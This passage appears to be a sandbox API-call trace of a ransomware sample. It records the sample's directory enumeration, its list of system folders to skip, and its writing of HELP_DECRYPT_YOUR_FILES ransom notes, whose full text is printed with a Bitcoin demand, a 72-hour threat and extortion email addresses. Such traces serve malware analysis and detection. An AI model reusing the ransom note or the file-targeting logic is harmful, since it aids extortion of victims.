	[0167.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d6b3081, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d6b3081, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d6d9590, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d68d1f1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d68d1f1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d6b3081, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 1
	[0167.610] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 0
	[0167.610] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.611] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.611] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0
	[0167.611] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.612] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.612] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d42abd7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d42abd7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d450c92, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.612] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d404fe7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d404fe7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d42abd7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.612] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 1
	[0167.612] lstrcmpW (lpString1="Task", lpString2="..") returned 1
	[0167.612] lstrcmpW (lpString1="Task", lpString2=".") returned 1
	[0167.612] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Microsoft\\Device Stage"
	[0167.613] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\"
	[0167.613] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\", lpString2="Task" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task"
	[0167.613] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task"
	[0167.613] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\"
	[0167.613] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\"
	[0167.613] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*"
	[0167.613] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.614] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned 50
	[0167.614] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.614] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\*.*") returned 0x32
	[0167.614] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.614] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="windows") returned 0x0
	[0167.614] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.614] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="boot") returned 0x0
	[0167.615] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.615] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="system volume information") returned 0x0
	[0167.615] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.615] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.615] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.615] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="temp") returned 0x0
	[0167.615] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="program files") returned 0x0
	[0167.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="appdata") returned 0x0
	[0167.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="application data") returned 0x0
	[0167.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="winnt") returned 0x0
	[0167.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="tmp") returned 0x0
	[0167.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="cache") returned 0x0
	[0167.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="webcache") returned 0x0
	[0167.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="inetcache") returned 0x0
	[0167.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="nvidia") returned 0x0
	[0167.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="packages") returned 0x0
	[0167.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="cookies") returned 0x0
	[0167.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="programdata") returned 0x0
	[0167.619] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.619] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1
	[0167.620] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1
	[0167.620] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0
	[0167.620] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.620] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.620] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task"
	[0167.621] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*"
	[0167.621] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.621] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.621] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\HELP_DECRYPT_YOUR_FILES.TXT") returned 74
	[0167.621] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.626] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.627] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.629] CloseHandle (hObject=0x388) returned 1
	[0167.630] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.630] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0167.632] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.632] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.632] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.633] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.633] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0167.633] CloseHandle (hObject=0x388) returned 1
	[0167.633] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.634] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.634] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.634] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\HELP_DECRYPT_YOUR_FILES.HTML") returned 75
	[0167.634] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.634] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.634] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0167.637] CloseHandle (hObject=0x388) returned 1
	[0167.638] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.638] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.639] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0167.640] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.640] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.640] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.640] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.659] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0167.661] CloseHandle (hObject=0x388) returned 1
	[0167.663] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d725924, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.665] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned 50
	[0167.665] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.666] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\*.*") returned 0x32
	[0167.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="windows") returned 0x0
	[0167.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.666] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="boot") returned 0x0
	[0167.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="system volume information") returned 0x0
	[0167.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="temp") returned 0x0
	[0167.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.667] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="program files") returned 0x0
	[0167.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.668] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.668] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="appdata") returned 0x0
	[0167.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.668] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="application data") returned 0x0
	[0167.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.668] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="winnt") returned 0x0
	[0167.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.669] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="tmp") returned 0x0
	[0167.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.669] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="cache") returned 0x0
	[0167.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
